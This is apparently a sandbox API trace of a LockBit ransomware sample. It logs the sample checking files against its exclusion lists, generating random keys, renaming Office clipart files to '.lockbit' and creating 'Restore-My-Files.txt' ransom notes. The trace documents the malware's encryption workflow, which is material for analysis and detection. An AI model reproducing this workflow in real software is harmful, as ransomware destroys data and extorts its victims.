[0164.297] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.297] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.298] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.298] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02384_.WMF") returned 1 [0164.299] lstrcmpiW (lpString1="ntldr", lpString2="NA02384_.WMF") returned 1 [0164.299] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02384_.WMF") returned 1 [0164.299] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02384_.WMF") returned -1 [0164.299] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02384_.WMF") returned -1 [0164.299] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02384_.WMF") returned 1 [0164.299] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02384_.WMF") returned -1 [0164.299] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.299] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02384_.WMF") returned=".WMF" [0164.299] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.299] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.299] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.300] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.300] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02384_.WMF.lockbit") returned 72 [0164.300] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02384_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0164.308] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.308] malloc (_Size=0x40068) returned 0x3df0008 [0164.308] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3032) returned 1 [0164.308] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.308] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0164.309] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.309] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0164.309] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0164.316] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02384_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02384_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.316] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.316] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.325] free (_Block=0x1fa2ed8) [0164.325] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02384_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.325] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.325] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.325] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x948, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02386_.WMF", cAlternateFileName="")) returned 1 [0164.325] lstrcmpiW (lpString1=".", lpString2="NA02386_.WMF") returned -1 [0164.326] lstrcmpiW (lpString1="..", lpString2="NA02386_.WMF") returned -1 [0164.326] PathFindExtensionW (pszPath="NA02386_.WMF") returned=".WMF" [0164.326] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.326] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.327] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.327] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.328] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.328] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.328] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.328] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.328] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02386_.WMF") returned 1 [0164.329] lstrcmpiW (lpString1="ntldr", lpString2="NA02386_.WMF") returned 1 [0164.329] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02386_.WMF") returned 1 [0164.329] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02386_.WMF") returned -1 [0164.329] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02386_.WMF") returned -1 [0164.329] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02386_.WMF") returned 1 [0164.329] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02386_.WMF") returned -1 [0164.329] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.329] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF") returned=".WMF" [0164.329] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.329] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.329] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.330] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.330] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF.lockbit") returned 72 [0164.330] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02386_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0164.333] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.333] malloc (_Size=0x40068) returned 0x1ff1e60 [0164.333] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2376) returned 1 [0164.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0164.334] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.335] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0164.335] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0164.341] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.341] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.341] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.342] free (_Block=0x1fa2ed8) [0164.342] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.342] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.342] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc84, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02388_.WMF", cAlternateFileName="")) returned 1 [0164.342] lstrcmpiW (lpString1=".", lpString2="NA02388_.WMF") returned -1 [0164.343] lstrcmpiW (lpString1="..", lpString2="NA02388_.WMF") returned -1 [0164.343] PathFindExtensionW (pszPath="NA02388_.WMF") returned=".WMF" [0164.343] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.343] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.346] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.347] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.347] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.351] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.351] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.351] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.351] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02388_.WMF") returned 1 [0164.351] lstrcmpiW (lpString1="ntldr", lpString2="NA02388_.WMF") returned 1 [0164.351] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02388_.WMF") returned 1 [0164.352] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02388_.WMF") returned -1 [0164.352] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02388_.WMF") returned -1 [0164.352] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02388_.WMF") returned 1 [0164.352] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02388_.WMF") returned -1 [0164.352] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.352] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02388_.WMF") returned=".WMF" [0164.352] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.352] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.352] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.353] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.353] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.353] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.353] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.353] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.353] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.354] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.354] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.354] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.354] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.354] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02388_.WMF.lockbit") returned 72 [0164.354] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02388_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02388_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0164.355] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.356] malloc (_Size=0x40068) returned 0x3df0008 [0164.356] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3204) returned 1 [0164.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0164.357] 